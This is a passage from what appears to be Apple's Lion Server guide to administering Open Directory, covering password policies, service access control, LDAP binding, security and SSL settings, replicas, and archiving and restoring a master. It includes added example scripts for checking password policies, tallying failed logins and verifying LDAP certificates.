2. Click Advanced, then click Options. You can click Options only if the password type is Open Directory or Shadow Password.
3. Change password policy options, then click OK. If you select an option that requires resetting (changing) the password, remember that some service protocols don't permit users to change passwords. For example, users can't change their passwords when authenticating for IMAP mail service.
4. Click Save.


Use pwpolicy to set password policies for a single user account


You can use pwpolicy to set an individual user account's password policy.

To change the password policy of a user account:

$ pwpolicy -a authenticator -setpolicy -u user "option=value..."

For example, to require that a user's password be at least 12 characters long and to allow that user no more than 3 failed login attempts, enter the following in a Terminal window, where authenticator is the name of an administrator with Open Directory authentication rights and user is the user's name:

$ pwpolicy -a authenticator -setpolicy -u user "minChars=12 maxFailedLoginAttempts=3"

For information about pwpolicy, see its man page.
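As an added example covering the pwpolicy commands (global and per-user) and the guidelines in Composing a Password, and not Apple's pwpolicy code, the following Python parses the option string handed to -setglobalpolicy or -setpolicy -u, checks a candidate password against it together with the composition guidelines, and models maxFailedLoginAttempts. minChars and maxFailedLoginAttempts are the options shown in this guide; requiresAlpha, requiresNumeric and passwordCannotBeName are further option names as I recall them from the pwpolicy man page and are an assumption here.

```python
import string

# Added example for this page (not Apple's pwpolicy code): parse the "option=value ..." string
# handed to pwpolicy -setglobalpolicy / -setpolicy -u, then apply it together with the
# composition guidelines from Composing a Password. minChars and maxFailedLoginAttempts
# appear in the guide; requiresAlpha, requiresNumeric and passwordCannotBeName are further
# pwpolicy option names as I recall them from its man page, so treat them as an assumption.
OPTION_TYPES = {
    "minChars": int,
    "maxFailedLoginAttempts": int,
    "requiresAlpha": int,          # 0 or 1
    "requiresNumeric": int,        # 0 or 1
    "passwordCannotBeName": int,   # 0 or 1
}
SYMBOLS = set(string.punctuation)

def parse_policy(spec: str) -> dict:
    """Turn 'minChars=12 maxFailedLoginAttempts=3' into a dict; unknown keys are errors, not ignored."""
    policy = {}
    for token in spec.split():
        key, sep, value = token.partition("=")
        if not sep or key not in OPTION_TYPES:
            raise ValueError(f"unknown or malformed policy option: {token!r}")
        policy[key] = OPTION_TYPES[key](value)
    return policy

def composition_problems(password: str) -> list:
    """Guidelines from Composing a Password that apply regardless of the configured policy."""
    problems = []
    if not password:
        problems.append("zero-length password")
    if not password.isascii():
        problems.append("non-ASCII characters")
    if password != password.strip() or " " in password:
        problems.append("leading, trailing, or embedded spaces")
    classes = sum((
        any(c.islower() for c in password), any(c.isupper() for c in password),
        any(c.isdigit() for c in password), any(c in SYMBOLS for c in password)))
    if classes < 3:
        problems.append("fewer than three character classes (lower, upper, digit, symbol)")
    return problems

def policy_violations(password: str, policy: dict, username: str = "") -> list:
    """Check a candidate password against a parsed pwpolicy dict."""
    violations = []
    if len(password) < policy.get("minChars", 0):
        violations.append(f"shorter than minChars={policy['minChars']}")
    if policy.get("requiresAlpha") and not any(c.isalpha() for c in password):
        violations.append("requiresAlpha")
    if policy.get("requiresNumeric") and not any(c.isdigit() for c in password):
        violations.append("requiresNumeric")
    if policy.get("passwordCannotBeName") and username and password.lower() == username.lower():
        violations.append("passwordCannotBeName")
    return violations

class FailedLoginCounter:
    """Models maxFailedLoginAttempts: after that many consecutive failures, login is disabled."""
    def __init__(self, policy: dict):
        self.limit = policy.get("maxFailedLoginAttempts", 0)   # 0 means no limit
        self.failed = 0

    def disabled(self) -> bool:
        return self.limit > 0 and self.failed >= self.limit

    def attempt(self, password_ok: bool) -> bool:
        """Record one login attempt; return whether the login is accepted."""
        if self.disabled():
            return False           # even a correct password is refused while login is disabled
        if password_ok:
            self.failed = 0
            return True
        self.failed += 1
        return False

if __name__ == "__main__":
    policy = parse_policy("minChars=12 maxFailedLoginAttempts=3")
    for candidate in ("Tr0ub4dor&3", "Tr0ub4dor&3xyz", " hunter two"):
        print(repr(candidate), policy_violations(candidate, policy), composition_problems(candidate))
```

The parser rejects unknown option names instead of silently accepting them, which is the failure mode to guard against when a typo such as "minchars" would otherwise leave the policy unset.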


Assign administrator rights for Open Directory authentication


Using Workgroup Manager and an administrator account with rights to work with Open Directory password settings, you can assign these rights to other user accounts in the same directory domain. To assign these rights, your user account must have an Open Directory password and privileges to administer user accounts. This requirement protects the security of passwords stored in the Kerberos KDC and the Open Directory Password Server database.

1. In Workgroup Manager (located in /Applications/Server/), open the account, click Advanced, and make sure Password Type is set to Open Directory. For more information, see Change the password type to Open Directory.
2. Click Privileges and choose Full in the Administration capabilities pop-up menu. To restrict the administration capabilities, choose Limited.
3. Click Save.


Set passwords of exported or imported users


When you export user accounts whose password type is Open Directory or shadow password, passwords are not exported. This protects the security of the Open Directory Password Server database and shadow password files. Before importing, you can use a spreadsheet application to open the file of exported users and set their passwords, which they can change the next time they log in. Such a file then holds passwords in clear text, so restrict access to it and delete it once the import is done. For instructions on working with files of exported users, see Workgroup Manager Help.

After importing user accounts, you have the following options for setting passwords:

You can set all imported accounts to use a temporary password, which each user can change the next time he or she logs in. For more information, see Assign a temporary password to multiple users.
You can set the password of each imported user account in the Basic pane of Workgroup Manager. For more information, see Change a user's password.

Lion Server user management
Open Directory services
Maintain Open Directory services

Control access to a server's login window


You can use Server Admin to control which users can log in to a Mac server using the login window. Users with server administrator privileges can always log in to the server.

1. Open Server Admin and connect to the server.
2. Click Settings, then click Access.
3. Click Services.
4. Select For selected services below and select Login Window in the list on the left.
5. Select Allow only users and groups below and edit the list of users and groups that you want to log in using the server's login window: Add users or groups that can use the login window by clicking the Add button (+) and dragging users or groups from the Users & Groups window to the list. Remove users or groups from the list by selecting them and clicking the Remove button (-).
6. Click Save.

If Allow all users and groups is selected when you select For selected services below in step 4, all services except login window permit access to all users and groups. If you want to restrict who can access a listed service in addition to the login window, select the service in the list, select Allow only users and groups below, and add users and groups to the list. If you want all users to log in using the server's login window, select Login Window, then select Allow all users and groups.


Control access to SSH service


You can use Server Admin to control which users can open a command-line connection to a Mac server using the ssh command in Terminal. Users with server administrator privileges can always open a connection using ssh. The ssh command uses the Secure Shell (SSH) service. For information about using the ssh command, see its man page.

1. Open Server Admin and connect to the server.
2. Click Settings, then click Access.
3. Click Services.
4. Select For selected services below and select SSH in the list on the left.
5. Select Allow only users and groups below and edit the list of users and groups that need SSH access to the server:
   Add users or groups that can open SSH connections by clicking the Add button (+) and dragging users or groups from the Users & Groups window to the list.
   Remove users or groups from the list by selecting one or more and clicking the Remove button (–).
6. Click Save.

If Allow all users and groups is selected when you select For selected services below in step 4, all services except SSH will permit access to all users and groups. If you want to restrict who can access a listed service besides SSH, select the service in the list, select Allow only users and groups below, and add users and groups to the list. If you want all users to be able to open an SSH connection to the server, select SSH, then select Allow all users and groups.


Configure Open Directory service access control


You can configure Open Directory service access control by configuring service access control lists (SACLs) using Server Admin. SACLs enable you to specify which administrators have access to Open Directory. Only users and groups listed in an SACL have access to the corresponding service. For example, to give administrator access to users or groups for the Open Directory service on your server, add them to the Open Directory SACL.

1. Open Server Admin and connect to the server.
2. Click Settings, then click Access.
3. Click Administrator.
4. Select the level of restriction you want for the services:
   To restrict access to all services, select For all services.
   To set access permissions for individual services, select For selected services below and then select Open Directory from the Service list.
5. Click the Add button (+) to open the Users & Groups window.
6. Drag users and groups from the Users & Groups window to the list.
7. Set user permissions:
   To grant administrator access, choose Administrator from the Permission pop-up menu next to the user name.
   To grant monitoring access, choose Monitor from the Permission pop-up menu next to the user name.
8. Click Save.


Check the status of an Open Directory server


Using Server Admin, you can confirm that the Open Directory master is functioning properly.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Open Directory.
4. Click Overview.
5. Make sure the status of all items listed in the Open Directory overview pane is Running. If any item is stopped, click Refresh (or choose View > Refresh). If Kerberos remains stopped, see If Kerberos is stopped on an Open Directory master or replica.


Monitor replicas and relays of an Open Directory master


Using Server Admin, you can check the status of replica creation and ongoing replication.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Open Directory.
4. Click Settings, then click General, to see a list of replicas and the status of each one. The status for a new replica indicates whether it was created successfully. Thereafter, the status indicates whether the most recent replication attempt was successful.


View Open Directory status and logs


You can use Server Admin to view status information and logs for Open Directory services. The following logs are available:

Directory services server log
Directory services error log
kadmin log
kdc log
LDAP log
Password service server log
Password service error log
Password service replication log
slapconfig log

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Open Directory.
4. Click Overview to see status information.
5. Click Logs and use the View pop-up menu to choose the log you want to see. The path to the log file appears above the log.
6. Optionally, enter text in the filter field and press Return to show only lines containing the text you entered.


Monitor Open Directory authentication


You can use the password service logs, visible using Server Admin, to monitor failed login attempts for suspicious activity. Open Directory uses logs to record failed authentication attempts, including the IP addresses that generate them. Periodically review the logs to determine whether there is a large number of failed attempts for the same password ID, indicating that somebody might be generating login guesses.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Open Directory.
4. Click Logs and choose the kdc log or a password service log from the View pop-up menu.
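As an added example that is not part of the Apple documentation, the following shell script performs the review this section describes over a few constructed password service log lines: it tallies failed authentications per password ID and source address so that a burst of failures against one ID stands out. The log field layout, the slot IDs, the short names and the addresses are constructed assumptions, not output from a real server.

```shell
#!/bin/sh
# Added example: tally failed authentication attempts per password ID and
# source IP. The sample below is CONSTRUCTED to resemble a password service
# log; the exact field layout of the real log is an assumption.

SAMPLE_LOG='Aug 03 2011 10:22:31  AUTH2: {0x4e36a1f2b5c7d8e9f0a1b2c3,alice} DIGEST-MD5 authentication succeeded from 10.0.1.25
Aug 03 2011 10:22:40  FAILED: {0x4e36a1f2b5c7d8e9f0a1b2c4,bob} DIGEST-MD5 authentication failed, SASL error -13 (password incorrect) from 203.0.113.7
Aug 03 2011 10:22:41  FAILED: {0x4e36a1f2b5c7d8e9f0a1b2c4,bob} DIGEST-MD5 authentication failed, SASL error -13 (password incorrect) from 203.0.113.7
Aug 03 2011 10:22:43  FAILED: {0x4e36a1f2b5c7d8e9f0a1b2c3,alice} CRAM-MD5 authentication failed, SASL error -13 (password incorrect) from 10.0.1.25
Aug 03 2011 10:22:44  FAILED: {0x4e36a1f2b5c7d8e9f0a1b2c4,bob} DIGEST-MD5 authentication failed, SASL error -13 (password incorrect) from 203.0.113.7
Aug 03 2011 10:22:45  FAILED: {0x4e36a1f2b5c7d8e9f0a1b2c5,carol} DIGEST-MD5 authentication failed, SASL error -13 (password incorrect) from 10.0.1.30
Aug 03 2011 10:22:46  FAILED: {0x4e36a1f2b5c7d8e9f0a1b2c4,bob} DIGEST-MD5 authentication failed, SASL error -13 (password incorrect) from 203.0.113.7
Aug 03 2011 10:22:50  AUTH2: {0x4e36a1f2b5c7d8e9f0a1b2c3,alice} DIGEST-MD5 authentication succeeded from 10.0.1.25
Aug 03 2011 10:22:55  FAILED: {0x4e36a1f2b5c7d8e9f0a1b2c5,carol} DIGEST-MD5 authentication failed, SASL error -13 (password incorrect) from 10.0.1.30'

# Read log lines on stdin; print "count passwordID user ip" for every
# (password ID, source IP) pair that produced failures, most frequent first.
failed_attempts() {
  awk '
    /FAILED:/ {
      # pull "0x<slot id>,<short name>" out of the {...} token
      if (!match($0, /[{]0x[0-9a-fA-F]+,[^}]+[}]/)) next
      tok = substr($0, RSTART + 1, RLENGTH - 2)
      split(tok, parts, ",")
      # the source address follows the word "from"; "unknown" if absent
      ip = "unknown"
      for (i = 1; i <= NF; i++) if ($i == "from") ip = $(i + 1)
      n[parts[1] " " parts[2] " " ip]++
    }
    END { for (k in n) print n[k], k }
  ' | sort -rn -k1,1
}

# Keep only pairs with at least $1 failures: the "large number of failed
# attempts for the same password ID" this section tells you to look for.
failed_over() {
  failed_attempts | awk -v t="$1" '$1 + 0 >= t + 0'
}

# Run the check against the constructed sample with threshold $1.
sample_failed_over() {
  printf '%s\n' "$SAMPLE_LOG" | failed_over "$1"
}

# Stand-alone run: report anything with three or more failures.
sample_failed_over 3
```

On a real server the same functions can be fed the log file shown under Logs in Server Admin, for example `failed_over 20 < /path/shown/in/Server/Admin`.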


Import records
Workgroup Manager can import all types of records into the LDAP directory of an Open Directory master. This includes users, groups, computer groups, computers, and all other standard Mac OS X record types.

Important: If you import user or group records from a file exported by Mac OS X Server v10.3 or earlier, each imported record is assigned a globally unique ID (GUID). To make sure that GUIDs and their relationships to specific users and groups remain the same (if you need to reimport the same users and groups), create an export file using Workgroup Manager in Lion Server. Use the Lion Server export file instead of the export file created using the earlier server version.

For a list of record types and attributes that can be imported, see the following file:
/System/Library/Frameworks/OpenDirectory.framework/Frameworks/CFOpenDirectory.framework/Headers/CFOpenDirectoryConstants.h

For more information about exporting users and groups using Workgroup Manager and on importing records of any type, see Workgroup Manager Help.


Set a binding policy for an Open Directory server


Using Server Admin, you can configure an Open Directory master to permit or require trusted binding between the LDAP directory and the computers that access it. Replicas of an Open Directory master inherit the master's binding policy.

Trusted LDAP binding is mutually authenticated. The computer proves its identity by using an LDAP directory administrator's name and password to authenticate to the LDAP directory. The LDAP directory proves its authenticity by means of an authenticated computer record created in the directory when you set up trusted binding.

Note: To use trusted LDAP binding, clients need Mac OS X v10.6 or Lion or Mac OS X v10.6 Server or Lion Server. Clients using v10.5 can use anonymous binding, but can't set up trusted binding.

Important: If your Lion Server is an Open Directory master, it has a diradmin user. When binding two directory servers, they should not have the same directory administrator user name (diradmin). If two Lion Servers are configured as Open Directory masters and are bound to each other, they become an invalid configuration and can cause random failures. Make one of the Open Directory master servers a standalone server, then recreate it using Server Admin with a unique username for the directory administrator instead of the default diradmin.

1. Open Server Admin and connect to the Open Directory master server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Open Directory.
4. Click Settings, then click Policies.
5. Click Binding, then set the directory binding options you want:
   To permit trusted binding, select Enable authenticated directory binding.
6. Click Save.

Important: If you choose Encrypt all packets (requires SSL or Kerberos) and Enable authenticated directory binding, make sure your users are using one or the other for binding and not both.


Set a security policy for an Open Directory server


Using Server Admin, you can configure a security policy for access to the LDAP directory of an Open Directory master. Replicas of the Open Directory master inherit the master's security policy.

Note: If you change the security policy for the LDAP directory of an Open Directory master, you must disconnect and reconnect (unbind and rebind) every computer connected (bound) to this LDAP directory.

1. Open Server Admin and connect to the Open Directory master server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Open Directory.
4. Click Settings, then click Policies.
5. Click Binding, then set the security options you want:
   Disable clear text passwords determines whether clients can send passwords as clear text if the passwords can't be validated using any authentication method that sends an encrypted password. For more information, see Select authentication methods for shadow password users and Select authentication methods for Open Directory passwords.
   Encrypt all packets (requires SSL or Kerberos) requires the LDAP server to encrypt directory data using SSL or Kerberos before sending it to client computers.
   Digitally sign all packets (requires Kerberos) certifies that directory data from the LDAP server won't be intercepted and modified by another computer while en route to client computers.
   Block man-in-the-middle attacks (requires Kerberos) protects against a rogue server posing as the LDAP server. This is best used with the Digitally sign all packets option.
   Disable client-side caching prevents client computers from caching LDAP data locally.
   Allow users to edit their own contact information permits users to change contact information on the LDAP server.
6. Click Save.

Important: If you choose Encrypt all packets (requires SSL or Kerberos) and Enable authenticated directory binding, make sure your users are using one or the other for binding and not both.

Based on the settings here, the security options can also be configured on each client of an Open Directory master or replica. If an option is selected here, it can't be deselected for a client. For more information about configuring these options on a client, see Change the security policy for an LDAP connection.


Limit search results for LDAP service


Using Server Admin, you can prevent one type of denial-of-service attack on a Mac server by limiting the number of search results returned by the server's shared LDAP directory domain. Limiting the number of search results prevents a malicious user from tying up the server by sending it multiple all-inclusive LDAP search requests.

1. Open Server Admin and connect to the Open Directory master or an Open Directory replica server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Open Directory.
4. Click Settings, then click LDAP.
5. Enter the maximum number of returned search results in the Return a maximum of __ search results field.
6. Click Save.


Set the search timeout interval for LDAP service


Using Server Admin, you can prevent one type of denial-of-service attack on a Mac server by limiting the amount of time the server spends on one search of its shared LDAP directory domain. Setting a search timeout prevents a malicious user from tying up the server by sending it an exceptionally complex LDAP search request.

1. Open Server Admin and connect to the Open Directory master or an Open Directory replica server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Open Directory.
4. Click Settings, then click LDAP.
5. Enter a search timeout interval in the Search times out in __ field. Set the time interval using the pop-up menu.
6. Click Save.


Set up SSL for LDAP service


Using Server Admin, you can enable Secure Sockets Layer (SSL) for encrypted communications between an Open Directory server's LDAP directory domain and computers that access it. SSL uses a digital certificate to provide a certified identity for the server. You can use a self-signed certificate or a certificate obtained from a certificate authority. For information about defining, obtaining, and installing certificates on your server, see Server Admin Help.

SSL communications for LDAP use port 636. If SSL is disabled for LDAP service, communications are sent as clear text on port 389.

1. Open Server Admin and connect to the Open Directory master or an Open Directory replica server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Open Directory.
4. Click Settings, then click LDAP.
5. Select the Enable SSL checkbox.
6. Use the Certificate pop-up menu to choose an SSL certificate that you want LDAP service to use. The menu lists all SSL certificates installed on the server. To use a certificate not listed, choose Manage Certificates from the pop-up menu. For more information about certificates, see Server Admin Help.
7. Click Save.


Create a custom SSL configuration for LDAP


SSL uses a digital certificate to provide a certified identity for the server. You can use custom digital certificates to configure SSL for your network environment. The following steps describe the command-line method for creating custom certificates and provide instructions for implementing them in Server Admin.

To create an Open Directory service certificate:

1. Generate a private key for the server in the /usr/share/certs/ folder. If the /usr/share/certs folder does not exist, create it, and run the following commands from within that folder:
   $ sudo openssl genrsa -out ldapserver.key 2048
2. Generate a certificate signing request (CSR) for the certificate authority (CA) to sign:
   $ sudo openssl req -new -key ldapserver.key -out ldapserver.csr
3. Fill out the following fields as completely as possible, making certain that the Common Name field matches the domain name of the LDAP server exactly, and leaving the challenge password and optional company name blank:
   Country Name:
   State or Province Name:
   Locality Name (city):
   Organization Name:
   Organizational Unit Name:
   Common Name:
   Email Address:
4. Sign the ldapserver.csr request with the openssl command:
   $ sudo openssl ca -in ldapserver.csr -out ldapserver.crt
5. When prompted, enter the CA passphrase to continue and complete the process. The certificate files needed to enable SSL on the LDAP server are now in the /usr/share/certs/ folder.
6. Click the triangle at the left of the server. The list of services appears.
7. From the expanded Servers list, select Open Directory.
8. Click Settings, then click LDAP.
9. Select the Enable SSL checkbox.
10. Use the Certificate pop-up menu to choose an SSL certificate that you want LDAP service to use. The menu lists all SSL certificates that have been installed on the server. To use a certificate not listed, choose Manage Certificates from the pop-up menu. For more information about certificates, see Server Admin Help.
11. Click Save.
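As an added example that is not part of the Apple procedure, this shell script performs the same key, CSR and signing steps non-interactively and then checks the one thing the procedure stresses: that the certificate's Common Name equals the LDAP server's DNS name. The host name ldap.example.com, the throwaway test CA, the scratch directory, and the use of `openssl x509 -req` (in place of `openssl ca`, which needs a configured CA directory) are assumptions made for this example.

```shell
#!/bin/sh
# Added example: create an LDAP server key, CSR and signed certificate, then
# verify the Common Name and the chain before handing the files to Server Admin.
# ldap.example.com, the test CA and the scratch directory are assumptions.

LDAP_HOST="ldap.example.com"

# Build everything under the directory given as $1.
# The CA here is a throwaway self-signed certificate created for the example;
# in production the CSR goes to your real certificate authority instead.
make_ldap_cert() {
  dir=$1
  mkdir -p "$dir"
  # throwaway CA key and certificate (example only)
  openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
    -keyout "$dir/ca.key" -out "$dir/ca.crt" \
    -subj "/CN=Example Test CA" >/dev/null 2>&1 || return 1
  # step 1 of the procedure: the server's private key
  openssl genrsa -out "$dir/ldapserver.key" 2048 2>/dev/null || return 1
  # steps 2 and 3: the CSR, with the DN fields supplied on the command line
  # and the Common Name set to the LDAP server's DNS name
  openssl req -new -key "$dir/ldapserver.key" -out "$dir/ldapserver.csr" \
    -subj "/C=US/ST=California/L=Cupertino/O=Example/OU=IT/CN=$LDAP_HOST" \
    2>/dev/null || return 1
  # step 4: sign the request with the CA
  openssl x509 -req -in "$dir/ldapserver.csr" \
    -CA "$dir/ca.crt" -CAkey "$dir/ca.key" -CAcreateserial \
    -days 365 -out "$dir/ldapserver.crt" 2>/dev/null || return 1
}

# Print the Common Name carried by the certificate file $1.
cert_cn() {
  openssl x509 -in "$1" -noout -subject -nameopt RFC2253 \
    | sed 's/^subject= *//' | tr ',' '\n' | sed -n 's/^CN=//p'
}

# Succeed only when the CN in certificate $1 equals the host name $2,
# the exact-match requirement the procedure places on the Common Name.
cn_matches() {
  [ "$(cert_cn "$1")" = "$2" ]
}

# Succeed only when certificate $2 chains to the CA certificate $1.
chain_ok() {
  openssl verify -CAfile "$1" "$2" >/dev/null 2>&1
}

# Stand-alone run: build in a scratch directory and report both checks.
workdir=$(mktemp -d)
if make_ldap_cert "$workdir"; then
  if cn_matches "$workdir/ldapserver.crt" "$LDAP_HOST"; then
    echo "CN matches $LDAP_HOST"
  else
    echo "CN mismatch: $(cert_cn "$workdir/ldapserver.crt")" >&2
  fi
  chain_ok "$workdir/ca.crt" "$workdir/ldapserver.crt" && echo "chain OK"
fi
rm -rf "$workdir"
```

The same `cert_cn` check is worth running against a certificate signed by a real CA before selecting it in the Certificate pop-up menu, since a CN that does not match the server's DNS name is the usual reason clients refuse the LDAP SSL connection.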


Make an Open Directory replica into a relay


There is not much difference between a relay and a replica. Both have a read-only copy of the Open Directory master's LDAP directory domain and also a read/write copy of the Open Directory Password Server and the Kerberos Key Distribution Center (KDC). A relay is a direct member replica of an Open Directory master and it has replicas that it replicates to.

You can make an Open Directory replica into a relay by ensuring the following:

The replica is a direct replica of the Open Directory master (first-tier).
The replica has replicas (supports up to 32 replicas).

For more information about relays, see Integrate with existing directory domains.


Configure locales
When a client connects to an Open Directory server, it may connect to an Open Directory master or to its replica. These connections can become unbalanced, meaning you have more connections to your OD master server than to its replica. If you have replicas on your network, you can configure locales to specify which Open Directory servers clients should use, and you can load balance your client connections between your Open Directory master and its replicas.

Locales are groups of servers that service a specified subnet. These servers are given a locale name similar to an Active Directory forest name. After configuring an Open Directory master and its replicas, two locales are configured by default. The first locale includes all of the Open Directory master's replicas, even those outside the subnet. This is created as a failsafe for the client if no locales are available for connection on the client's subnet. The second locale is based on the subnet of the Open Directory master. This can include some of its replicas if they are on the same subnet. Servers and clients on the same subnet use that Open Directory master and its replicas for directory service.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Open Directory.
4. Click Settings, then click Locales.
5. From the Locale list, click the Add button (+).
6. Enter a name in the Name field for the locale. This name is similar to an Active Directory forest name and is used by clients to connect to the locale.
7. (Optional) In the Comment field, enter a comment about the locale.
8. Click the Add button (+) below the Server list.
9. From the list of Open Directory servers, choose the Open Directory servers you want in your locale by selecting the checkbox next to each server, then click OK.
10. Click the Add button (+) below the Subnets list.
11. Enter the subnet or subnets that will use the locale servers and click OK. You can enter multiple subnets.
12. Click Save.


Promote an Open Directory replica


If an Open Directory master fails and you cannot recover it from a backup, you can promote a replica to be a master. The new master (promoted replica) uses the directory and authentication databases of the replica. After doing this, you must convert all other replicas of the old master to standalone directory services and then make them replicas of the new master.

Use this procedure only to replace an Open Directory master with its replica. To keep the Open Directory master in operation and make its replica another master, do not use this procedure. Instead, decommission the replica and then make it a master as described in Decommission an Open Directory replica and Set up an Open Directory master.

1. Open Server Admin and connect to the replica server you want to promote to a master.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Open Directory.
4. Click Settings, then click General.
5. Click Change. This opens the Open Directory Assistant.
6. Select Promote replication to an Open Directory Master, then click Continue.
7. Enter the following Master Domain Administrator information, then click Continue.
   Short Name, Password: You must create a user account for the primary administrator of the LDAP directory. This account is not a copy of the administrator account in the server's local directory domain. Make the short names of the LDAP directory administrator different from names of user accounts in the local directory domain.
   Note: If you plan to connect your Open Directory master to other directory domains, pick a unique name and user ID for each domain. Don't use the suggested diradmin user ID. Use a name that helps you identify the directory domain that the directory administrator controls.
8. Enter the following Master Domain information, then click Continue.
   Kerberos Realm: This field is preset to be the same as the server's DNS name, converted to capital letters. This is the convention for naming a Kerberos realm. You can enter a different name if necessary.
   Search Base: This field is preset to a search base suffix for the new LDAP directory, derived from the domain portion of the server's DNS name. You can enter a different search base suffix or leave it blank. If you leave this field blank, the LDAP directory's default search base suffix is used.
9. Confirm settings, then click Continue. This saves your settings and restarts the service.
10. Click Done.
11. In Server Admin, connect to another replica of the old master.
12. Click the triangle at the left of the server. The list of services appears.
13. From the expanded Servers list, select Open Directory.
14. Click Settings, then click General.
15. Click Change. The Open Directory Assistant opens.
16. Choose Set up a Standalone Directory, then click Continue.
17. Confirm the Open Directory configuration setting, then click Continue.
18. If you are sure that users and services no longer need access to the directory data stored in the shared directory domain that the server has been hosting or was connected to, click Close. This saves your settings and restarts the service.
19. Click Change. The Open Directory Assistant opens.
20. Choose Set up an Open Directory Replica, then click Continue.
21. Enter the following information:
   IP address or DNS name of Open Directory master: Enter the IP address or DNS name of the server that is the Open Directory master.
   Root password on Open Directory master: Enter the password of the Open Directory master system's root user (user name system administrator).
   Domain administrator's short name: Enter the name of an LDAP directory domain administrator account.
   Domain administrator's password: Enter the password of the administrator account whose name you entered.
22. Click Continue.
23. Confirm the Open Directory configuration settings, then click Continue.
24. Click Done. This saves your settings and restarts the service.
25. For each replica of the old master, repeat steps 11 through 23.
26. Make sure the date, time, and time zone are correct on the replicas and the master. The replicas and the master should use the same network time service so their clocks remain in sync.

If other computers were connected to the old Open Directory master's LDAP directory, reconfigure their connections to use the new master's LDAP directory. Each Mac and Mac server with a custom search policy that included the old master's LDAP directory must be reconfigured to connect to the new master's LDAP directory. Use the Services and Authentication panes of Directory Utility (located in Users & Groups preferences). For more information, see Reconfigure LDAP directory access.


Decommission an Open Directory replica


You can take an Open Directory replica server out of service by making it a standalone server or by connecting it to another system for directory and authentication services.

1. Verify that the network connection is working between the Open Directory master and the replica you want to decommission. Port 389 or 636 must be open between master and replica while decommissioning the replica. LDAP uses port 389 if SSL is disabled or port 636 if SSL is enabled on the master.
   Important: If you decommission a replica while there is no network connectivity between it and the master, the decommissioned replica remains in the master's list of replicas. The master tries to replicate to the decommissioned replica as specified in the General settings pane for Open Directory service on the master server.
2. In Server Admin, connect to the replica you want to decommission.
3. Click the triangle at the left of the server. The list of services appears.
4. From the expanded Servers list, select Open Directory.
5. Click Settings, then click General.
6. Click Change. The Open Directory Assistant opens.
7. Choose Decommission replica and set up a standalone directory or Decommission replica and connect to another directory, and enter the following information.
   Root password on Open Directory master: Enter the password of the Open Directory master system's root user (user name system administrator).
   Domain administrator's short name: Enter the name of an LDAP directory domain administrator account.
   Domain administrator's password: Enter the password of the administrator account whose name you entered.
8. Click Continue.
9. Confirm the Open Directory configuration setting, then click Continue.
10. If you are sure that users and services no longer need access to the directory data stored in the shared directory domain that the server has been hosting or was connected to, click Done. This saves your setting and restarts the service. Assuming there is a network connection between the Open Directory master and the replica, the master is updated to no longer connect to the replica.
11. If you chose Decommission replica and connect to another directory from the Open Directory Assistant, click the Open Directory Utility button to configure access to directory systems. For more information about configuring access to a directory service, see Directory Utility Help.


Archive an Open Directory master


You can use Server Admin to archive a copy of an Open Directory master's directory and authentication data. You can archive a copy of the data while the Open Directory master is in service. The following files are archived:

LDAP directory database and configuration files
Open Directory password server database
Kerberos database and configuration files
Local directory domain and shadow password database

If you have a reliable archive of an Open Directory master, you effectively have an archive of all its replicas. If a replica develops a problem, you can change its Open Directory role to standalone server and then set up the server as if it were a new server, with a new host name, and set it up as a replica of the same master as before.

Important: Carefully safeguard the archive media that contains a copy of the Open Directory password database, the Kerberos database, and the Kerberos keytab file. The archive contains passwords of all users who have an Open Directory password, both in the shared LDAP directory domain and in the local directory domain. Your security precautions for the archive media should be as stringent as for the Open Directory master server.

1. Open Server Admin and connect to the Open Directory master server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Open Directory.
4. Click Archive.
5. In the Archive in field, enter the path to the folder where you want the Open Directory data archived, then click the Archive button. You can enter the folder path or click Choose to select it.
6. Enter a name and password to use in encrypting the archive, then click OK.


Restore an Open Directory master


You can use Server Admin or the slapconfig command-line tool to restore an Open Directory master's directory and authentication data from an archive. If you use Server Admin, you can restore to a server that is an Open Directory master. The following files are restored by merging the archive with the existing master:

LDAP directory database and configuration files
Open Directory password server database
Kerberos database and configuration files

If conflicts are encountered during the merge operation, the existing record takes precedence over the one in the archive. The archive record is ignored. Conflicts are recorded in the slapconfig log file (/Library/Logs/slapconfig.log), which you can view using Server Admin. See View Open Directory status and logs.

Instead of restoring an Open Directory master from an archive, you might get better results by promoting a replica to be the master. The replica might have more recent directory and authentication data than the archive. After restoring an Open Directory master from an archive, you must recreate your Open Directory replicas.

Important: Don't restore an archive as a means of porting directory and authentication data from one system to another. Instead, export from the source directory and import to the target directory. For more information about exporting and importing directory data, see Workgroup Manager Help.

1. Open Server Admin and connect to the Open Directory master server. The target server must have the same Kerberos realm name as the master that the archive was created from.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Open Directory.
4. Click Archive.
5. In the Restore from field, enter the path to the Open Directory archive file, then click the Restore button. You can enter the path or click Choose to select the archive file.
6. Enter the password that was used to encrypt the archive when it was created, then click OK.
7. When the restore operation finishes, check the slapconfig log for information about conflicts or other events that occurred while restoring.
8. Convert existing Open Directory replica servers to Open Directory standalone servers and then make them replicas of the new master. For more information, see Set up a standalone directory service and Set up an Open Directory replica or relay.


Use slapconfig to restore an Open Directory master


